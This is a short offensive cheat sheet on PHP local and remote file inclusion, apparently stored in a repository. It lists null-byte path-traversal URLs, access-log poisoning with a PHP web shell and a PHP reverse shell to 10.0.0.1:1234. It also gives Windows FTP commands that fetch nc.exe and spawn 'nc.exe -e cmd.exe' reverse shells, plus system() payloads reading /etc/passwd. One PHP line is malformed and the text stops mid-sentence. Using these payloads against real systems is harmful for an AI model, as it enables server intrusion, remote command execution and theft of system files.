PTZ/profile_files/.ptz/v3das/web_file_inclusion.txt

42 lines
1.5 KiB
Plaintext
Raw Normal View History

2017-01-16 20:52:08 +00:00
Local File Inclusion
====================
The %00 make php 5.3 and below ignore everything after that.
Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
...then let's add code to the access log :)
~# nc 192.168.1.1 80
<?php echo shell_exec($_GET['cmd']);?>
...and use it
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
...or php shell on linux:)
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
...finally send the requests to nc and exploit:
# Windows FTP upload
echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
nc.exe -e cmd.exe 192.168.1.1  31337
- - - - - - - -
<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo bin >> ftp.txt'); ?>
<? system('echo GET nc.exe >> ftp.txt'); ?>
<? system('echo bye >> ftp.txt'); ?>
<? system('ftp -s:ftp.txt'); ?>
<? system('nc.exe -e cmd.exe 192.168.1.1  31337'); ?>
<?php phpinfo()?>
<? system("cat /etc/passwd"); ?>
<?php echo shell_exec($_GET["cmd"]);?>
<?php include="124.1.1.1" ?>
Remote file Inclusion
=====================
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
Note: the login.txt contains